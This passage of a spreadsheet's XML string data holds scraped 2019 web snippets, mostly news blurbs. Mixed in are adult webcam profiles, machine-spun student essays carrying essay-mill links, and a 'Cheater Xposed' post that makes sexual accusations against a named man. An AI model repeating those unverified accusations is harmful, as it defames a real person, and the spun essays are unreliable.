stabilization mechanism. The company’s Celo Gold and Celo Dollar tokens are pegged to the U.S. dollar and backed by a collateral of digital assets. But like Facebook’s Libra, it too aims to create a more inclusive, global financial system—a way to “bank the unbanked.” This release of Celo’s SDK for Ethereum developers comes just weeks after launching their prototype Alfajores Testnet platform and Android wallet, along with open sourcing their codebase and design after two years of development. The first developer libraries on Celo’s platform are meant to enable interaction with Celo smart contracts and assets, as well as tools to build new financial dapps that connect to the Celo wallet and leverage the Celo platform. The use cases for Celo, according to the company, include peer-to-peer lending, micro loans, micro insurance, social payments and savings applications that can be built with the goal of creating an open and inclusive financial system. Enter your email for weekly highlights from Web 3.0’s startup world! Celo says it has conducted over 150 user interviews and run pilot programs of their wallet application in Colombia, Argentina, Kenya and Tanzania allowing users and merchants to transact cryptocurrency payments using mobile phones. “We’ve seen a positive response from communities inside and outside crypto, particularly with people who are aligned to our mission and interested in building dapps optimized for mobile experiences,” Slavich said. “Polychain is now in the process of reviewing Ecosystem Fund applications and we’re screening candidates for both our fellowship program and to join the C Labs team. We are also building out tools for people to make Celo their own.” The startup is encouraging community participation to help provide feedback for new features, improvements, and bug fixes. Some of the highlights of their active development include an iPhone wallet app, security audits, bug bounty program, and privacy enhancements. Slavich said Celo is currently working on an “updated SDK and launching an interactive game to test some of the protocol properties and infrastructure this fall,” with the network going live shortly thereafter.</t>
  </si>
  <si>
    <t>My Kinks: sex toys Webcam profile: sexy and hot Favourite sex position: doggy-style What I do in my amateur show: polite people What I don’t like: impolite people Gallery</t>
  </si>
  <si>
    <t>Nat Jarvis</t>
  </si>
  <si>
    <t>Johann Zarco the 2015 and 2016 Moto2 World Champion will leave the RedBull KTM Factory Racing Team at the end of the 2019 campaign, cutting short his two-year contract under a mutual agreement with the factory. Since joining the team in November 2018 Zarc has struggled to get to grips with the KTM RC16 machine, with KTM trying to mold the RC16 to the Frenchman’s style, and Zarco himself trying to adapt his style to the bike. Johann Zarco’s best qualifying result came in Brno, Czech Republic Grand Prix where he qualified on the front row for the first time since leaving Yamaha, although this was in mix conditions and could only convert third on the grid to fourteenth in the race. Zarco’s best result came at the Catalan Grand Prix in Montmelo where he secured tenth place, but despite a few more points finish’s has yet to achieve the same result. The Frenchman took to social media to talk about the split saying “It is official, I will not race with KTM Factory Racing for the 2020 MotoGP season. It was a hard decision to take. I have the chance to do the best work in the world and I want to do it with a smile racing for podiums. As a professional, I keep focused for the rest of the 2019 season giving my best and trying to improve my skills.” https://www.instagram.com/p/B1DpBprgbmK/ With limited seats for the 2020 season, it is yet to be seen where Zarco will sign for next season, with World Superbikes being the most likely outcome.</t>
  </si>
  <si>
    <t>OPP issued charges under the Liquor Licence Act on Canal Lake and the Burnt River.</t>
  </si>
  <si>
    <t>The AMD Radeon RX 5700 XT has been out for about a month now, and while it’s delivering some great 1440p gaming experiences, the graphics card has a tendency to pump out some noticeably high temperatures. However, in a blog post Team Red released, it details that AMD Radeon RX 5700 XT graphics cards that hit 110 degrees Celsius are operating within specs and are totally fine. This is due to how these graphics cards measure temperatures. Rather than throttling at an average temperature, like most GPUs, the RX 5700 XT will only throttle when the hottest part of the GPU hits the 110 degrees Celsius thermal junction temperature. We’ll show you how to build a PC Here are the best Nvidia graphics cards Check out the best gaming PCs AMD states that this allows these Radeon graphics cards to “offer much higher performance out of the box, while maintaining acoustic and reliability targets.” Team Red also assures customers that they’ll have access to both the peak temperature of the chip, along with a more standard average temperature, so they’ll have insight as to how their graphics card is performing. So, while some users might not be comfortable with their graphics cards hitting triple-digit temperatures, AMD claims that this is working as-expected. And, given how its processors operate at high temperatures, too, that shouldn’t be too surprising. Heating up One thing that might be looking at however, is the effect this could have on the rest of your system. Sure, the graphics card is more than capable of handling these high temperatures, but if the air its shooting out is overheating other components, like the chipset, there could be some problems. However, this is just pure speculation on our part. However, there are already plenty of third-party AMD Radeon RX 5700 XT graphics cards showing up, so if you’re not comfortable with high temps, there should be a third-party option available to you that keeps things a bit cooler. At the end of the day, though, AMD does say these high temps are normal and are nothing to worry about. So, if you’ve been seeing high temperatures on your graphics card, you can rest assured that it’s not about to melt in your PC case. Check out the wonderful world of PC components Intology Limited: http://www.intology.co.uk/about-us.php Twitter: https://twitter.com/Intology Facebook: https://www.facebook.com/Intology Read more: The AMD Radeon RX 5700 XT gets hot – but it’s supposed to</t>
  </si>
  <si>
    <t>Why We Study Astrophysics at Tufts… and When you Too Hi there! My name is Jed, I’m some senior with Tufts University or college. Over my favorite four years here We have tried to be concerned in many groupings and things to do ranging from Males Rugby so that you can Freeform Advertising, but its always been my instructional community containing defined very own experience. I am an Astrophysics major. All the way through my time at Stanford I’ve executed research about distant galaxies and learned the decorations of megastars, all the while traveling to understand what it means to be a college student of physics and astronomy. Some sort of physics instruction is supposed to supply you with a deeper plus much more meaningful perception of the world you deal with. Besides purposes in anatomist and solutions, reducing the actual observable world to imperative laws is actually compelling for a couple reasons. Firstly, there is significant beauty in how the terminology of math guides physics. At a glance, the expression ‘beauty’ may be out of place in the learning of physics. But I just find physics evocative inside much the same technique that the performs of Monet or Picasso compel feeling. Following the stipulation of logical thought all the down to concision tutorial wrapping up a long time, days or simply years of deliver the results to a single statement instructions is awe-inspiring and wonderful. Tufts University kinds a diverse Physics and Astronomy group. Coming from high energy to high redshift, faculty, masteral and undergrad research covers a wide range. The actual Physics plus Astronomy Section allows you to focus your investigation by participating research plus interacting with folks at its forefront. Are you interested in the principle building blocks of matter: primary school particles? Check out Professor “” and Teacher Beauchemin meant for topics at experimental high energy physics. Perhaps you are interested in in no way the smallest this universe is offering, but the major. If so, sign in with analysis teams thinking about galactic and also extragalactic background lead by way of Professors Sajina and Marchesini (you’ll obtain me there as well)! For the past 2 years I have been executing research around extragalactic astrophysics, particularly that specialize in some of the most respected star factories to ever previously exist. Precisely incredible is always that we can in fact point to any epoch within the history on the universe when galaxies have been creating a great deal more stars as compared to at any some other period. Unfortunately due to issues such as great distances as well as envelopes about gas and dust, actually getting rid of these galaxies is tough. For these reasons all of us use a combination of empirical studies and statistically rigorous computer software to determine the hidden evolutionary qualities of these amazing and distinctive galactic multitude. Before arriving in Tufts, I think breaking into your field with research could be daunting. However process is made easy and exhilarating at Stanford because of our families and friends and friends in Physics and Astronomy. At Stanford, to go greater into your Physics education will be to befriend your professors and also peers. We have a close, connected and collaborative community that works between undergraduates, graduates, post-doctoral fellows and college alike. Friday’s Physics Colloquium brings the total department together for a drink and candies before guest lecturers via around the countryside present in fascinating and innovative contemporary research. I chose Tufts due to its community, and turn into that on the rugby review or from the research laboratory, this local community has often defined this experience. One particular Less Quiet Girl What does the item mean for being an your introvert? To realize this ask, let me take a step back to jr . high, an era when I can have shuddered at the very subject. If mentioned my “big fat fearfulness, ” Outlined on our site have said being alone. I’ve been the average community butterfly, ungratefully known as the very chatterbox. In college, Me the paradoxical adult toddler, who really likes Fro-Yo tiffs and sleeps with her crammed Dumbo kept tightly in opposition to her chest, but really likes a advancing, stormy discussion concerning nearly anything in the classroom. And a second of the indications of being a thoroughly lost and confused freshman is being bombarded with lots of, overwhelming issues. In which are you with? How many which have do you converse? http://writeessayfast.com Would you be dressed in pajamas towards your IR school? Are you fearful that you peaked in graduating high school? I’m just just for a long time grateful not everybody ever lifted the subject about my favorite big weight fear. You know what mine nonetheless was? Isolation. It’s perfectly logical that it took me for a long time to appreciate the particular comforts for solitude. Around my efforts to stay constantly connected, I started to pick up good friends and discussions. But the considerably more I lost control into the masses, stayed available late and also surrounded by myself with pals, the dark a troubling sensation took root inside me. My partner and i realized that I had been increasingly missing a very exclusive friend. Myself. And if I actually considered My family to be on their own, was I must say i any significantly less lonely? Disagreeing realizations triggered deliberate self- introspection. The larger I paid attention to the infinite jargon regarding thoughts inside my go, the a smaller amount afraid I grew for confronting numerous fears. Reasonably speaking, worries of taking my own business didn’t automatically equal correlate towards loneliness or unhappiness. I just wasn’t prepared to accept the fact I was absolutely capable of savoring a meal without the pretense to be busy driving my laptop, or browsing through new roads alone from a perfectly written content frame of mind utilizing my favorite ebook in hand, due to the fact not all who else wander will be lost. These kind of realizations encouraged me to help exercise greater control over my sociable lifestyle, and even quite frankly given to my favorite overall well- being. Make it happen forever we appreciate you long, important conversations in addition to religiously contribute to the chaos erupting in our popular room. However I am at the same time capable of enjoying silent car rides with the radio blasting in the background. I want hearing the other people have to be able to. My friends swear I’m an excellent listener, as well as a part- period lunatic mainly because they’ve seen me calmly dance to help my favorite songs at the section. (In my defense, it previously was just a smooth swaying and I wasn’t around anyone’s approach. ) Mainly because self- abrege is still a popular topic within my head, i want to ask any rhetorical problem and take my teach of considered. Am I ridiculous? Surely! Maybe? Absolutely Not. I’m just the average amazing introvert.</t>
  </si>
  <si>
    <t>Came across this dunny in two seperate bunnings. Mondella rococo rimless square pan. Was $139 on clearance for $50. Both Mcgrath Hill and Rouse hill had stock. I assume other bunnings will also have stock as well. Cue the jokes… I'll start it off. It's a crappa of a deal.</t>
  </si>
  <si>
    <t>LONDON — Emiliano Sala, the Argentine soccer player who died in a plane crash in the English Channel in January, had been exposed to “potentially fatal” levels of carbon monoxide, the British authorities revealed on Wednesday. Mr. Sala, 28, who was on a flight from France to Wales on Jan. 21 when the aircraft went down, sustained carbon monoxide poisoning in the cockpit of the plane, according to a report released by Britain’s Air Accidents Investigation Branch as part of its inquiry into the crash. Toxicology tests on Mr. Sala’s blood revealed that he had been exposed to the odorless, colorless gas at a high level that “in an otherwise healthy individual is generally considered to be potentially fatal,” according to the interim report, or special bulletin. Mr. Sala’s body was not recovered until February. The body of the plane’s pilot, David Ibbotson, has not been found, but investigators concluded that he would most likely have been affected by carbon monoxide exposure. Exposure to carbon monoxide, or CO, can damage the brain, heart and nervous system, with symptoms including blurred vision, loss of coordination, seizures, heart attack and unconsciousness. “It is clear from the symptoms that exposure to CO can reduce or inhibit a pilot’s ability to fly an aircraft depending on the level of that exposure,” the report said. Days before the crash, Mr. Sala had transferred from Nantes in the top French league to Cardiff City of the English Premier League. He was traveling to Cardiff in a single-engine, propeller-driven Piper Malibu aircraft when it vanished over the English Channel near Guernsey. Mr. Sala had sent concerned messages about the condition of the plane before taking off, warning that the aircraft “seems like it’s falling to pieces,” a WhatsApp audio message to a group of friends revealed. “If, in an hour and a half, you have no news from me, I don’t know if they are going to send someone to look for me, because they are not going to find me,” he said in the message. The Air Accidents Investigation Branch, which is part of the British government’s Department for Transport, is exploring the source of the carbon monoxide. “The investigation continues to look into a wide range of areas in relation to this accident, but in particular we are looking at the potential ways in which carbon monoxide can enter the cabin in this type of aircraft,” said Geraint Herbert, the principal inspector of air accidents at the investigation branch, in a video posted on Twitter. Although the discovery of carbon monoxide poisoning sheds light on the crash, officials cautioned against speculation over the cause until their full report is issued. The special bulletin said that investigators were still looking into “pertinent operational, technical, organizational and human factors which might have contributed to the accident.” Mr. Sala’s funeral was held in the village of Progreso, Argentina, in February, and he was to be cremated, officials said. In April, a photograph circulated online of what was believed to be Mr. Sala’s body in the mortuary, prompting a police investigation. This month, two Britons appeared in court and acknowledged accessing CCTV footage of Mr. Sala’s post-mortem examination. The two were released on bail and will appear before the same court next month. Source link</t>
  </si>
  <si>
    <t>Nick Toscano</t>
  </si>
  <si>
    <t>Victoria's gambling watchdog has been instructed to launch an urgent investigation into Crown Resorts' business ties to suspected Chinese criminals.</t>
  </si>
  <si>
    <t>Registration for fall swim programs through the City of Regina filled up within hours of being available online.</t>
  </si>
  <si>
    <t>U.S. Home | Mail Online MailOnline - get the latest breaking news, celebrity photos, viral videos, science &amp; tech news, and top stories from MailOnline and the Daily Mail newspaper. New York jogger gives his socks and sneakers to a homeless man and walks away barefoot Sunday 18 August 2019 08:52 PM UTC-05 Twitter user @NYorNothing posted a video of the moment, which she happened to witness while riding in a cab in downtown Manhattan at about 9am Sunday.</t>
  </si>
  <si>
    <t>evan Blanco in Austin Texas is a recruiter at VMware during the day but his REAL full-time jobs are cheating, philandering, soliciting boys and engaging in booty call encounters with random young boys and older married men! Kevan Blanco is 59 years old who was once married to a woman but she soon divorced him after she caught him partaking in lewd and lascivious acts with various men! Kevan Blanco has children but it is anyone’s guess as to whether the kids are truly his biological kids from his previous marriage. Kevan Blanco goes for married men who are who are afraid to come out in the open. Kevan Blanco is a serial marriage destroyer and he needs to be stopped!!! The post Kevan Blanco in Austin Texas is a marriage destroyer appeared first on Cheater Xposed - Cheater Exposed USA.</t>
  </si>
  <si>
    <t>Japanese Greek Hangman game – select either to guess the Japanese or the Greek word from the head word in the other language. The word to guess is represented by a row of dashes, giving the number of letters. View the history of words used in the game and click on the list to show … Continue reading Japanese Greek Hangman →</t>
  </si>
  <si>
    <t>Sushi 79 operator and directors of the outlets in Ipswich and Currimundi have been fined.</t>
  </si>
  <si>
    <t>An arena in the hometown of retired hockey player Jarome Iginla will be named after him at a ceremony this weekend.</t>
  </si>
  <si>
    <t>US stocks have slumped after the bond market threw up one of its last remaining warning flags on the economy.</t>
  </si>
  <si>
    <t>Tana Mongeau – F**k Up (OFFICIAL Music Video) download video Tana Mongeau – F**k Up (OFFICIAL Music Video) fullhd download youtube review Tana Mongeau – F**k Up (OFFICIAL Music Video) down show to Tana... The post Tana Mongeau – F**k Up (OFFICIAL Music Video) appeared first on Shop Reviews.</t>
  </si>
  <si>
    <t>My Kinks: I love to chat – especially with smart men! I love Webcam profile: I am nice – but also sexy, funny, naughty. I love to give you pleasure and entertain you, I like to listen, I like to talk and to have fun together. Come and enjoy! Favourite sex position: Sexyness and sensuality comes from attitude. I do believe it and I can prove I am girl with attitude. Also I am easy talking to, too sweer at times… and I adore teasing! What I do in my amateur show: Men who have something to offer to girl: kisses, touches, gifts What I don’t like: Freeloaders, shy guys. I look forward for my gifts and max attention Gallery</t>
  </si>
  <si>
    <t>Canada's Genevieve Lalonde won the gold medal in the women's 3,000-metre steeplechase and Marco Arop took gold in the men's 800 metres Saturday at the 2019 Pan American Games.</t>
  </si>
  <si>
    <t>A Tamil family facing deportation from Australia has been secretly moved to Christmas Island overnight, according to supporters. Supporters of the family said the family were given brief access to a mobile phone so they could provide an update, but are now being blocked from communicating with the public. Priya, her husband Nades and their two Australian-born daughters were put on a plane from Melbourne on Thursday night, to be deported to Sri Lanka, but were grounded in Darwin and were granted an Eleventh-hour injunction to pursue a last-ditch legal bid to keep them in Australia. Following a court hearing in Melbourne on Friday, the Immigration Minister has been blocked from removing the child and her family until Wednesday. Home Affairs Minister Peter Dutton says the decision is final but supporters are begging the government to show mercy.</t>
  </si>
  <si>
    <t>Hurricane Dorian has powered toward Florida with increasing fury in what is being billed as the biggest storm to hit the state’s east coast in nearly 30 years.</t>
  </si>
  <si>
    <t>Take a little tour around the gorgeous Paradise Taveuni Resort with http://www.dive-the-world.com. See the sights of Taveuni island then check out the accommodation, beaches, facilities and activities of this South Pacific island resort. The post Paradise Taveuni Resort – Scuba Diving Fiji appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>zilverbat. posted a photo: The nightlife in Quebec is exciting and full of life, the</t>
  </si>
  <si>
    <t>A man has been charged after allegedly assaulting a security guard and a police officer at an AFL match in Geelong on Saturday night.</t>
  </si>
  <si>
    <t>Share your journey, news tips, interesting pictures, video and comments with other Melbourne Express readers via email or Twitter.</t>
  </si>
  <si>
    <t>City officials say the firefighter who was seriously injured in the Woodman Avenue explosion has been released from hospital.</t>
  </si>
  <si>
    <t>We are a fast casual, family-owned Mexican restaurant. Our menu focuses on authentic Mexico city style cuisine with fresh, local ingredients. We are seeking experienced line cooks who are able to execute a Mexican menu as well as perform basic kitchen prep and cleaning duties. Some experience in a similar role and legal work status .. Read more</t>
  </si>
  <si>
    <t>A Russian pilot who managed to land his disabled plane in a cornfield after birds hit both engines has said a quick landing was his only chance.</t>
  </si>
  <si>
    <t>The Australian team continues to show promising form one year out from the Tokyo Olympics with more gold at the test event in Enoshima.</t>
  </si>
  <si>
    <t>Source: http://feedproxy.google.com/~r/typepad/alleyinsider/silicon_alley_insider/~3/bM7s5UpvynU/flywire-ceo-on-hiring-at-startup-changes-and-getting-investment-2019-8 The CEO of a $700 million startup explains why he’s ditched the normal rules of hiring by leaving candidates with his assistant and taking them on team lunches Flywire is a Boston-based payments company which has raised more than $143 million in VC funding. The company makes international payments across healthcare and education simpler and recently raised $100 million to give it a valuation of around $700 million, according to PitchBook. CEO Mike Massaro claims that changing his hiring approach has helped bring in better talent to the business. Click here for more BI Prime stories. Hiring the best staff is one of the toughest parts of running a succesful business. Getting the right people with the best culture fit is a major cause of stress for founders. Beyond asking a set of generic questions to get responses, how do you get people who are the right culture fit for your company, particularly at an executive level? Mike Massaro, CEO of Boston-based payments company Flywire, has his own way of dong things. “When I’m looking at working with an investor or trying to hire an executive I have a set of little tricks and tests I like to employ,” he told Business Insider in an interview. “Such as, how do they treat the wait staff if you’re at a dinner? Sometimes, I leave prospective candidates alone with my assistant in the meeting room and say i’m going to be late to see how they react to that and interact with her in that period.” For Massaro, it’s important to ensure that potential staff behave as they would in a professional environment at that time. Unsurprisingly, a head of sales will probably sell themselves well at interview, but how do they interact with other staff members? “Sometimes in the middle of a four hour interview session, I’ll say we’re having lunch with the team and then watch them to see whether they go first or last in line, whether they speak to people and interact with staff,” Massaro added. “It’s important that you have a culture fit.” Massaro told Business Insider that his approach has helped hire team members who have been instrumental to the company’s recent successes. Flywire was founded in 2009 by Spanish entrepreneur Iker Marcaide, and was originally called peerTransfer. Massaro took over in 2013. The company handles billions in payments each year, having provided software to universities and healthcare providers to aggregate their payments processes. While Massaro declined to give details on the firm’s valuation, data-firm PitchBook has said that the company secured $100 million in funding earlier this year to be valued at approximately $700 million with around $143 million in total financing. This need for culture fit extends to getting the right investors on board too, according to Massaro. “It helps when boards understand the business because you need those people to be there when things are going wrong, not going well, and it’s the same with investors,” he said. SEE ALSO: This CEO has a pitch-deck slide titled ‘Why you shouldn’t invest in us’ that he says was a key draw for $140 million in VC funding Join the conversation about this story » NOW WATCH: The US women’s national team dominates soccer, but here’s why the US men’s team sucks Source: http://feedproxy.google.com/~r/typepad/alleyinsider/silicon_alley_insider/~3/bM7s5UpvynU/flywire-ceo-on-hiring-at-startup-changes-and-getting-investment-2019-8 The post The CEO of a $700 million startup explains why he’s ditched the normal rules of hiring by leaving candidates with his assistant and taking them on team lunches appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>In his memoir, Mr. Morris reveals a wilder side, including trips to places like Studio 54 with students who were minors at the time. He estimated the number of his sexual partners to be “10,000 and counting!” though he does not specify the ages of those partners. From his equestrian facilities on the East Coast, Mr. Morris churned out the country’s best riders during the ’60s, ’70s and ’80s, many of whom lived with him on site as working students, competing in the junior, or 18-and-under, division. Michael D. Cintas, who coached equestrians for the United States Olympic modern pentathlon team in 2008, said he won a scholarship to train and live on Mr. Morris’s farm in 1964 when he was 16. Mr. Cintas, who said he was not abused, considers Mr. Morris a father figure. But he said that his coach’s reputation for having sexual relationships with boys he would scout and bring to train on the farm was common knowledge among students and barn staff. “Many people saw what was going on, knew what was going on, and no one said anything,” said Mr. Cintas, who now acknowledges that what was taking place at the Morris farm was wrong. The United States Equestrian Federation said it could act only if a claim were reported to it. None were received until 2012, Bill Moroney, the chief executive, said in an email responding to questions about Mr. Morris. “We received one allegation against him in 2012, which was thoroughly investigated by an independent third-party who did not find sufficient evidence to proceed with disciplinary action against Mr. Morris,” Mr. Moroney wrote in the email. “That case remained open in the event additional information, evidence, or witness(es) came forward.” Jonathan Soresi said he was in a relationship with Mr. Morris as a teenager and was one of the sources of the complaint that led to the coach’s lifetime ban. Mr. Soresi, who now operates a horse farm in Flemington, N.J., was a student of Mr. Morris’s during the 1970s and the first person to report Mr. Morris to SafeSport, according to two people with knowledge of the investigation. Source link</t>
  </si>
  <si>
    <t>Robert Harris presents a compelling dystopian vision of a world that has had to rediscover how to live without digital technology or electricity.</t>
  </si>
  <si>
    <t>For the first time ever, a woman has taken out cycling's gruelling Transcontinental Race, beating the nearest male competitor by more than 10 hours in a 10-day slog across Europe.</t>
  </si>
  <si>
    <t>NSW Labor Party boss Kaila Murnain will give evidence today with the knowledge that many of her colleagues are already calling time on her reign.</t>
  </si>
  <si>
    <t>While regulatory uncertainty permeates the crypto industry currently due to the United States suddenly taking an aggressive and negative stance against the digital asset class, in the UK, Ripple (XRP) has gained sudden clarity alongside Bitcoin and Ethereum. According to new classifications revealed by the Financial Conduct Authority, Ripple joins the other two most dominant crypto assets on the market, in being classified as an exchange or utility token instead of the more damning security token classification. XRP Classified As Exchange or Utility Token By Financial Conduct Authority Ripple’s Global Head of Government Relations Michelle Bond recently revealed news that the UK’s financial market conduct regulator the Financial Conduct Authority, has classified Ripple as an exchange or utility token in its latest report, removing the possibility of being labeled a security token. Being labeled a security token could come with additional scrutiny. Related Reading | United States Regulators Begin Crack Down on Crypto and Bitcoin Crime The report compares Ripple to Ethereum most closely, saying that “XRP has similar features,” such as being used as a “means of ‘payment’ (exchange token)” or to “run applications (utility token).” Bitcoin is an example of another crypto asset that the FCA classifies as an exchange or utility token, providing investors with regulatory clarity. .@TheFCA now lists XRP in the company of BTC and ETH, both of which were previously classified as exchange and/or utility tokens (and not a security token). This is exactly the kind of regulatory clarity the industry needs. https://t.co/lCr3Bm0JRk https://t.co/RI8rea7MaK — Michelle Bond (@michellebond111) August 12, 2019 The Financial Conduct Authority is a financial market regulator first established in 2013 that operates independently from the UK government and is instead funded by the fees generated from the some 58,000 financial firms it regulates. The regulatory entity’s purview covers creating the guidelines that financial markets and firms operate under, overseeing the consumer credit industry, and the firm has the been granted the power to freeze assets of any financial market participants it investigates, even before they are found guilty. Ripple Is the Crypto Asset For Banks and Financial Regulators While Bitcoin and Ethereum are decentralized crypto assets that were created on the idea that government control is bad for financial markets, and that people should be in charge of their own assets. XRP, on the other hand, was created by Ripple, a financial firm seeking to disrupt the cross-border settlement market. XRP is the native crypto token for the Ripple protocol. And while it’s being classified under the FCA as being an exchange or utility token similar to Bitcoin and Ethereum, the crypto community see Ripple’s control over XRP similar to the control current financial market organizations have over money and assets, making it a poor choice given the original cryptocurrency ethos. Related Reading | Ripple Sides With US Regulators on Crypto Controversy and Facebook Libra But it’s because Ripple does have a corporation behind it, and a Global Head of Government Relations to help ensure they comply with important financial market regulators like the FCA. In the United States, Ripple’s close ties to the banking industry here in the have helped it stay in favor over other crypto assets like Bitcoin and Ethereum in terms of getting the world of traditional finance to welcome crypto with open arms.</t>
  </si>
  <si>
    <t>TAX codes are used by an employer or pension provider to work out how much Income Tax should be taken from one’s pay or pension. What does the tax code 1250L mean? Daily Express :: Finance Feed Is tax code 1250L right for you? How to check if your tax code is correct</t>
  </si>
  <si>
    <t>Shares in Burford fell 66% on Wednesday after Carson Block's Muddy Waters bet against the firm. The post Corporate raider speaks out on targeting UK firms appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>Lighting has struck several locations across the Tatra Mountains in southern Poland and neighbouring Slovakia, killing five people, including two children, and injuring dozens more.</t>
  </si>
  <si>
    <t>The mosaic in Berkshire is one of just three of its kind in the world, says expert Anthony Beeson. The post Roman mosaic in ‘exciting’ discovery just three of its kind, says expert appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>The best of the week's live comedy</t>
  </si>
  <si>
    <t>My Favorite Location If I needed to choose a favored place to go concerning classes or right after classes or maybe on quiet Sunday days, it would should be Tisch Collection roof. Seeing that college students, we often forget that must be literally unattainable to be between friends and even teachers plus well… men and women every single second of every day without intending a little insane. We need living space, and absolutely nothing wrong with admitting that to your self. With declaring it some other people. Of course, we’re all simply human. As well as some of us haven’t shared a room as particular as a sleeping quarters before in our lives. Since someone who looks forward to those events of solitude and needs to begin with an hour per day to me to magnify and charge, I discover Tisch rooftop to be the best escape. In this article I can complete everything inside my leisure together with the beautiful scenery of Birkenstock boston stretched out looking at me along with keeping everyone company. I could read 400 pages about postwar Do you wish to literature, discussion a counter-argument to my favorite philosophy tellings, forget about the reality Econ home work is due during 11: 59pm tonight, along with take a minimal siesta in making up for the fact that 8: 30 Spanish type I sadly signed up for. We can take a moment for you to forget this assignments, the worries, my favorite troubles, my frets, my local freinds, etc ., in addition to focus on me personally and my very own writing. An awesome breeze whips my wild hair back and forth, dazzling my perspective, whipping the pages about my note pad violently back and forth, and yet As i welcome a company. writemyessay4me I love its daily life. It makes me conscious as I click pen so that you can paper as well as immerse myself in my innermost thoughts, all those thoughts that will so often get neglected plus aren’t provided with the time about day through any other occasion. Here these days, a sample of any silly bit short storyline I has written while on the top today when drinking Tazo’s calm chamomile tea and bobbing our head to many chill tracks playing way too loudly around my headphones (I hope anyone enjoy): “What’s that? lunch break he required, pointing in the small pink notebook hard pressed protectively versus her chest. Its sides were frayed, a worn red ribbon dangling off the side and starting to motion limply back and forth as a slight breeze did start to pick up on the library ceiling. The binding was messy and worn from several months of smooth opening and closing, the actual red band barely capable of contain the ink-stained pages sure within. These looked as if they were gonna burst through the binding any kind of time second. The particular boy attempted to imagine the item now, the main book growing: he spotted the pages soaring, traveling by air, caught during the wind; some sort of flash regarding red yellowish blue purple black brownish gold. Colours, colors all over. He never ever knew it previously was possible to check out so many colors in such bit of time. He imagined catching glimpses of run away words since they flew by way of, his biceps reaching out inside of a desperate attempt and touch these types of words, to experience the rough surface of the website against his particular fingertips. But yet he recognized he would not be fast sufficient – the very girl’s biceps would outstretch his, get faster, cling closer, for they were the girl words, plus they bent during her may. She had created these folks, strung these together to form sentences, to uncover meaning, and for that they were grateful. Therefore they only responded to your ex. She would snatch each article long before the person even experienced even commenced to approach what these kinds of words ended up, what they explained. He seldom had the perfect time to string one particular sentence alongside one another, take a person small consider that which your lover protected so fiercely towards her chest muscles. And that distressed him. No, it angered him. All he witnessed now was basically red. Any burning, flaming red. Meant for he planned to know; this individual wanted to read. Why more than likely she allow him to in? Precisely why wasn’t this individual capable of if you let himself on? Suddenly using the: he had displaced his exercise of considered and had also been whisked in to reality, the location where the girl silently laid patiently. “What was of which? ” Your ex had reacted, and yet he been far too lost in his own feelings, running outdoors and widespread in his have imagination, to check on her. At times the internal echoes of one’s head roared miles away louder when compared with any additional sound. This individual pointed around the book once more in an attempt to regain his imagination. Where experienced he left off? Ok. He shook away all thoughts, facial area flushed. This individual decided to check with the query again, even though he learned the girl experienced heard them the first time. “What’s that? ” he requested again, timidly, awkwardly. The item seemed much more00 difficult asking the second time. He gazed quizzically for her, and after that at the pink cover. In the back of his scalp, a ecroulement of colors re-appeared, blinding your ex once more. No . He attempted to shake all of them away yet again, yet we were looking at already long gone again. They had only visit momentarily. The woman smiled during him, and even tapped just one finger resistant to the hard, reddish colored surface. The exact noise did actually rattle thru his travel. It was as though she happen to be tapping with his head of hair and his skin and his lean muscle, right into the skull. Nevertheless it do not hurt. It turned out a pleasant tapping, more of the innocent probe than everything else. He experienced pleasure. Ease. He desired nothing more than to attain his offer and faucet her head. Stupid. His or her cheeks burnt red all over again. He cannot understand themself. What constructed him believe that he could realize her? “Why this? inch she claimed, and unearthed once more with the surface, rattling his brain. Rattling his or her brain. “Why… this is the indoors my neural. ” “The monotony along with solitude of the quiet existence stimulates the main creative your head. ” tutorial Albert Einstein</t>
  </si>
  <si>
    <t>Claudia Foxcroft</t>
  </si>
  <si>
    <t>There are hundreds of campsites in Great Britain with a variety of accessible layouts and facilities. Camping, glamping and caravanning holidays all have that taste of outdoor adventure. Camping and Glamping Camping ‘under canvas’ is easier than you might think, if you select the right campsite. Woodview Campsite in Bude features gently sloping grassed areas […] The post Guide To Accessible Wild Weekends In Great Britain appeared first on Able Magazine.</t>
  </si>
  <si>
    <t>me4president</t>
  </si>
  <si>
    <t>Origin Energy - Solar Optimiser plan - this has the highest feed-in tariff I've seen in NSW other than the Solar Boost Plus plan In the link provided (Go to deal) - click on the "Yes, I have solar panels" to view the Solar Optimiser plan https://www.originenergy.com.au/electricity-gas/plans.html Solar Optimiser plan - uses your current system FIT - 21c/kWh Usage rate - 28.58c/kWh Daily Supply Charge - 87.45c/day 12 month contract - no exit fee or lock-ins solar PV system must be net metered and must not be larger than 10kW Solar Boost Plus plan - requires purchase of a PV solar system from Origin FIT - 23c/kWh Usage rate - 28.58c/kWh Daily Supply Charge - 87.45c/day Further details can be obtained by contact Origin Energy Things to consider - check your area provider before signing up - as the usage rate and daily supply charge will vary depending on your residential area in NSW. FIT rates - https://www.originenergy.com.au/solar/feed-in-tariff-rates.h... T&amp;C Solar Optimiser plan - https://www.originenergy.com.au/terms-and-conditions/solar-o... T&amp;C Solar Boost Plus plan - https://www.originenergy.com.au/terms-and-conditions/solar-b...</t>
  </si>
  <si>
    <t>Chesterholme's owner also runs Whorlton Hall, where filming appeared to show patients abused. The post ‘Inadequate’ Hexham care home put in special measures appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>Afterpay rival Zip Co rattled investors after it admitted that competition was heating up to the point that new entrants were using aggressive financial measures to enter the market which has lead to margin compression.</t>
  </si>
  <si>
